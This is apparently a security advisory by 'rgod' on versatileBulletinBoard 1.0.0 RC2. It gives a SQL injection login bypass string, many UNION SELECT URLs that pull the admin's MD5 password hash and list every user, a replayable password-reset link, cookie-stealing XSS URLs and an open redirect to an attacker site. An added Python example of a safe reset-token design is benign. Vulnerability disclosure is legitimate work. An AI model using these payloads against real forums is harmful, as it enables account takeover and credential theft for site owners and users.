versatileBulletinBoard V1.0.0 RC2 (possibly prior versions) multiple SQL injection vulnerabilities / login bypass / board takeover
versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)
multiple SQL Injection vulnerabilities / login bypass / cross site scripting /
information disclosure
software:
site: http://vbb.eniki.de/
all of the following work only if magic_quotes_gpc is off...
A)
i) SQL INJECTION / LOGIN BYPASS
you can log in as admin by typing:
login: ' or 1 and name='[adminname]'/*
pass: [whatever]
you can also log in with the credentials/rights of any other user by typing:
login: ' or 1 and name='[username]'/*
pass: [whatever]
ii) SQL INJECTION in the "search this thread" feature while browsing the forum:
%')UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user where name='[admin_nickname]'/*
(the input field is too short to type this by hand, but the POST request can be
edited...)
iii) SQL INJECTION in the index.php "select" argument
http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
iv) SQL INJECTION in the index.php "categ" argument
http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
also, we have:
http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,ID,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
(this lists the user ID of any user, which is needed later for issue x) below;
the admin's user ID is usually "11")
v) SQL INJECTION in the "to" argument when posting a private message (you need
to be logged in to do this):
http://[target]/[path]/index.php?target=pm&to='UNION%20SELECT%20pass%20FROM%20vbb_user%20WHERE%20name='[admin_nickname]'/*
vi) SQL INJECTION in the "search for posts" feature:
%'UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user/*
vii) SQL INJECTION in the userlistpre.php "list" argument:
http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20pass,0,0,0%20FROM%20vbb_user%20WHERE%20name='[admin_name]'/*
viii) SQL INJECTION when viewing a user profile:
http://[target]/[path]/index.php?target=profile&select='UNION%20SELECT%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
with ii), iii), iv), v), vi), vii) and viii) the admin's MD5 password hash is
shown on screen
ix) SQL INJECTION, you can list all users; this could be useful to dump all
passwords from the database:
http://[target]/[path]/userlistpre.php?list='%20or%20isnull(1/0)/*
to check whether your installation is vulnerable, just type ' in the login
field: if you get a SQL error, it is
x) SQL INJECTION in the "forgot password" feature: a user could manipulate the
email field to have new passwords for any admin/user sent to himself
you will receive a link like this:
http://[target]/[path]/index.php?target=setpass&u=11&ph=[your old MD5 password hash]
to set a new password, but... you can call this url at any time if you know
the hash
combining these issues a user can take full control of the board, reset
all passwords...
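Added example (not from the advisory and not code from versatileBulletinBoard): the setpass link described above uses the user's current MD5 hash as the secret, never expires and can be replayed, so any of the hash leaks in ii) through viii) turns into a password reset. The in-memory store below shows the usual fix: a random token that is stored only as a hash, bound to one user id, valid for a limited time and consumed on first use. The "t" parameter name, the TTL and the injectable clock are assumptions made for this example.

```python
# Added example, not part of rgod's advisory or of versatileBulletinBoard: a
# password-reset link scheme without the weaknesses of the setpass design above
# (old MD5 hash as the secret, no expiry, reusable).  Constructed; assumes an
# in-memory store and an injectable clock so the expiry can be exercised.
import hashlib
import secrets
import time

TOKEN_TTL = 15 * 60  # seconds a reset link stays valid (assumed value)


class ResetTokenStore:
    def __init__(self, now=time.time):
        self._now = now
        # sha256(token) -> (user_id, expires_at).  The raw token is never
        # stored, so dumping this table via SQL injection yields no usable link.
        self._pending = {}

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def issue(self, user_id):
        """Create a fresh token for user_id and return it for the e-mailed link."""
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._pending[self._digest(token)] = (user_id, self._now() + TOKEN_TTL)
        return token

    def redeem(self, user_id, token):
        """True exactly once, for the right user, before expiry.  The token is
        removed on any attempt, so a wrong user id or a late attempt burns it."""
        entry = self._pending.pop(self._digest(token), None)
        if entry is None:
            return False
        owner, expires_at = entry
        return owner == user_id and self._now() <= expires_at


def build_reset_link(base_url, user_id, token):
    """The link that would be mailed: 'u' is public, the token is the only secret
    (parameter name 't' is an assumption of this example)."""
    return "%s/index.php?target=setpass&u=%d&t=%s" % (base_url, user_id, token)


if __name__ == "__main__":
    store = ResetTokenStore()
    tok = store.issue(11)
    print(build_reset_link("http://board.example", 11, tok))
    print("first redeem:", store.redeem(11, tok))
    print("second redeem:", store.redeem(11, tok))
```

Because the stored digest, not the token, is what a database leak exposes, and because the token has no relation to the user's password hash, leaking vbb_user no longer lets anyone construct a valid reset link.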
proof of concept exploit incoming...
B)
xi) XSS:
possible cross site scripting; you can craft a malicious url that redirects a
user to an arbitrary location:
http://[target]/[path]/dereferrer.php?url=http://[evil_site]/[evil_script]
and you can manipulate user cookies, poc:
http://[target]/[path]/dereferrer.php?url=%25%2522><script>alert(document.cookie)</script><!--
http://[target]/[path]/imagewin.php?file="><script>alert(document.cookie)</script>
also, you can craft malicious urls that, by manipulating sql queries, make the
page show some evil javascript, poc:
http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20"<script>alert(document.cookie)</script>",0,0,0%20FROM%20vbb_user/*
C)
xii) information disclosure:
this is an online utility, but listing all files and their versions doesn't
seem very safe ;)
http://[target]/[path]/getversions.php
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/versatile100RC2.html